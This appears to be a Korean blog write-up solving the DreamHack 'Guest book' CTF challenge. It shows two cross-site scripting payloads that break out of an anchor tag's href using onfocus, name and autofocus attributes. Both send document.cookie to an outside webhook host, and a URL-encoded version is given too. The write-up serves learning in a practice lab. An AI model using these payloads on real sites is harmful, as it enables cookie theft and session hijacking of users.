🏴CTF/DreamHack

DreamHack - Guest book 풀이

Janger 2023. 9. 7. 10:44
728x90

 

방법 1. name과 onfocus 사용

 

[dreamhack](#' name='foo' onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie')

 

위 텍스트를 URL Encoding 한다.

 

%5Bdreamhack%5D%28%23%27%20name%3D%27foo%27%20onfocus%3D%27location%2Ehref%3D%60https%3A%2F%2Fbqfyoyg%2Erequest%2Edreamhack%2Egames%2Fcookie%3D%60%2Bdocument%2Ecookie%27%29

 

인코딩 된 값을 content 파라미터 값으로 건네주는데 URL 뒤에 #foo를 포함하는 것이 핵심

http://host3.dreamhack.games:13138/GuestBook.php?content={인코딩된 내용}#foo

위 주소로 들어가게 되면 a 태그가 자동으로 focus 되면서 공격자의 웹 훅으로 request를 하게 된다.

 

 

 

방법 2. autofocus와 onfocus 사용

 

[dreamhack](#' autofocus onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie')

 

이건 다른 풀이 문제에서 찾은 방법이다. URL 뒤에 fragment를 작성하지 않아도 (방법 1)하고 결과가 같다. 

 

Reference

 

https://security.stackexchange.com/questions/168909/xss-inside-anchor-tag-a-without-user-interaction

 

XSS inside anchor tag (<a>) without user interaction?

Is it possible to inject a payload inside <a> tag such that the script runs without user interaction? The injection is inside the href attribute. I can inject onmouseover or onclick attribut...

security.stackexchange.com

 

728x90